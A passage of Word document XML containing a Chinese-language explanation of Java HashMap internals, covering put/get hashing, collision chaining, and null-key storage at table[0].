        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="008A2AD9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>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 xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当我们往</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hashmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元素的时候，先根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值得到这个元素在数组中的位置（即下标），然后就可以把这个元素放到对应的位置中了。如果这个元素所在的位子上已经存放有其他元素了，那么在同一个位子上的元素将以链表的形式存放，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>新加入的放在链头，最先加入的放在链尾</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。从</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hashmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元素时，首先计算</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hashcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，找到数组中对应位置的某一元素，然后通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法在对应位置的链表中找到需要的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="008A2AD9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>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lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="008A2AD9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>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具体的实现是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRDefault="008A2AD9" w:rsidP="008A2AD9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当你的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，会调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>putForNullKey,HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>允许</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>null,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>这样的对像是放在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>table[0]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F7C38" w:rsidRPr="009F7C38" w:rsidRDefault="009F7C38" w:rsidP="008A2AD9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3432710"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="26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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3432710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F7C38" w:rsidRPr="009F7C38" w:rsidRDefault="009F7C38" w:rsidP="009F7C38">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这里先遍历</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>table[0]</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>出的链表，看是否已经存放过</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，如果存在则替换掉此</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值，否则就在</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>table[0]</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>处插入</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F7C38" w:rsidRPr="009F7C38" w:rsidRDefault="009F7C38" w:rsidP="009F7C38">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ps:</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这里我们可以看出</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>均是放在</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>table[0]</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>处的，并且</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值也为</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F7C38" w:rsidRPr="001104F1" w:rsidRDefault="009F7C38" w:rsidP="001104F1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="00B55DAA" w:rsidP="008A2AD9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008A2AD9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果不为空，则调用</w:t>
      </w:r>
